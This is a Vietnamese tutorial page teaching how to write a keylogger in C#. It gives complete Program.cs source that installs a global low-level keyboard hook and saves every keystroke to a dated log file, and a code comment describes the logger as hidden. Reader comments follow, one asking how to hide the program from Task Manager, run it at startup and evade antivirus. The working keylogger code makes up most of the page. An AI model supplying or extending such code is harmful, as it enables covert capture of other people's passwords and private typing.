Lập trình Keylogger với C# Application

Lập trình Keylogger với C# Application

Giới thiệu các API cần thiết tool Keylogger với C# Console Application Giới thiệu các API cần thiết tool Keylogger với C# Console Application Giới thiệu các API cần thiết tool Keylogger với C# Console Application Giới thiệu các API cần thiết tool Keylogger với C# Console Application Giới thiệu các API cần thiết tool Keylogger với C# Console Application 4/5 (12 reviews)

Giới thiệu các API cần thiết tool Keylogger với C# Console Application

Đã đăng 2016-12-12 11:24:37 bởi HowKteam
11 bình luận 8355 lượt xem
Giới thiệu các API cần thiết tool Keylogger với C# Console Application 4 /5 stars (6 reviews)
 

Không có gì tuyệt vời hơn là luyện tập với ví dụ thực tế. Nào cùng nhau thử thách bản thân với tool: Keylogger

Bạn nên có kiến thức về:

 • Console application
 • Threading
 • Bitmap
 • Vòng lặp
 • Xử lý chuỗi
 • Nhiều thứ linh tinh khác

Code Program.cs

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace KeyLogger
{
  class Program
  {
    #region hook key board
    private const int WH_KEYBOARD_LL = 13;
    private const int WM_KEYDOWN = 0x0100;

    private static LowLevelKeyboardProc _proc = HookCallback;
    private static IntPtr _hookID = IntPtr.Zero; 

    private static string logName = "Log_";
    private static string logExtendtion = ".txt";

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr SetWindowsHookEx(int idHook,
      LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool UnhookWindowsHookEx(IntPtr hhk);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
      IntPtr wParam, IntPtr lParam);

    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);

    /// <summary>
    /// Delegate a LowLevelKeyboardProc to use user32.dll
    /// </summary>
    /// <param name="nCode"></param>
    /// <param name="wParam"></param>
    /// <param name="lParam"></param>
    /// <returns></returns>
    private delegate IntPtr LowLevelKeyboardProc(
    int nCode, IntPtr wParam, IntPtr lParam);

    /// <summary>
    /// Set hook into all current process
    /// </summary>
    /// <param name="proc"></param>
    /// <returns></returns>
    private static IntPtr SetHook(LowLevelKeyboardProc proc)
    {
      using (Process curProcess = Process.GetCurrentProcess())
      {
        using (ProcessModule curModule = curProcess.MainModule)
        {
          return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
          GetModuleHandle(curModule.ModuleName), 0);
        }
      }
    }

    /// <summary>
    /// Every time the OS call back pressed key. Catch them 
    /// then cal the CallNextHookEx to wait for the next key
    /// </summary>
    /// <param name="nCode"></param>
    /// <param name="wParam"></param>
    /// <param name="lParam"></param>
    /// <returns></returns>
    private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
    {
      if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
      {
        int vkCode = Marshal.ReadInt32(lParam);

        WriteLog(vkCode);
      }
      return CallNextHookEx(_hookID, nCode, wParam, lParam);
    }

    /// <summary>
    /// Write pressed key into log.txt file
    /// </summary>
    /// <param name="vkCode"></param>
    static void WriteLog(int vkCode)
    {
      Console.WriteLine((Keys)vkCode);
      string logNameToWrite = logName + DateTime.Now.ToLongDateString() + logExtendtion;
      StreamWriter sw = new StreamWriter(logNameToWrite, true);
      sw.Write((Keys)vkCode);
      sw.Close();
    }
    
    /// <summary>
    /// Start hook key board and hide the key logger
    /// Key logger only show again if pressed right Hot key
    /// </summary>
    static void HookKeyboard()
    {
      _hookID = SetHook(_proc);
      Application.Run();
      UnhookWindowsHookEx(_hookID);
    }
    #endregion   
    
    
    static void Main(string[] args)
    {
      HookKeyboard();
    }
  }
}

Bài sau chúng ta sẽ cùng nhau tạo timmer.

Đừng quên: “Luyện tập – Thử thách – Không ngại khó

Chia sẻ:
Thảo luận Hỏi và đáp Báo lỗi bài viết
Hủy bỏ   hoặc  
Giới thiệu các API cần thiết tool Keylogger với C# Console Application
Thanh Duy 2018-04-06 22:20:50

Anh ơi, cho em hỏi chút! Làm sao mà mình hook ra phân biệt được chữ in ha với chữ in thường ạ?

0 bình chọn
Reply
View all 2 comments
Kteam - Howkteam Free Education
an01647719738 2018-09-03 21:43:02
Tự dịch nó thôi bạn :v
0 bình chọn
Reply
Kteam - Howkteam Free Education
an01647719738 2018-09-03 21:44:39
khi viết chữ in hoa thì người ta bấm phím Shift trước sau đó đến các chữ cái sau.
0 bình chọn
Reply
Giới thiệu các API cần thiết tool Keylogger với C# Console Application
Nguyễn Văn Thắng 2017-11-19 07:00:29

Anh cho em hỏi chút ạ, nếu em không có các kiến thức cần thiết như anh nói thì em học có thể tiếp thu được không ạ?

0 bình chọn
Reply
Giới thiệu các API cần thiết tool Keylogger với C# Console Application
Ngô Minh 2017-10-03 21:55:21

em bị exception unhandled:        $exception    {"Could not find a part of the path 'c:\\users\\user\\documents\\visual studio 2017\\Projects\\key\\key\\bin\\Debug\\Log_03\\10\\2017.txt'."}    System.IO.DirectoryNotFoundException

0 bình chọn
Reply
Giới thiệu các API cần thiết tool Keylogger với C# Console Application
DungC# 2017-06-20 07:19:27

Vâng em cảm ơn anh , nó chạy được rồi ! Mà có cách nào nó ẩn trong task manager và startup và thoát khỏi Antivirus ko anh ?

0 bình chọn
Reply
Giới thiệu các API cần thiết tool Keylogger với C# Console Application
DungC# 2017-06-19 18:53:31

Mỗi lần chạy có 0,2 giây là nó tự tắt anh ơi !

1 bình chọn
Reply
View all 1 comments
Kteam - Howkteam Free Education
K9 2017-06-19 21:43:13
sao biết tự tắt? nó chạy ẩn đó
0 bình chọn
Reply
Giới thiệu các API cần thiết tool Keylogger với C# Console Application
tranconghuy20020 2017-03-01 15:44:29
Sao chữ Run em nó k nhận anh ơi ? Chỗ Application.Run(); ấy
0 bình chọn
Reply
Giới thiệu các API cần thiết tool Keylogger với C# Console Application
Le Sinh 2016-12-26 17:39:13
Em complie thử cũng không chạy được a ơi
1 bình chọn
Reply
View all 1 comments
Kteam - Howkteam Free Education
K9 2016-12-26 20:23:18
chạy gi cơ? bài cuối có code đó e
0 bình chọn
Reply
Hủy bỏ   hoặc  
Hủy bỏ   hoặc  

Chiến dịch

Kteam - Howkteam Free Education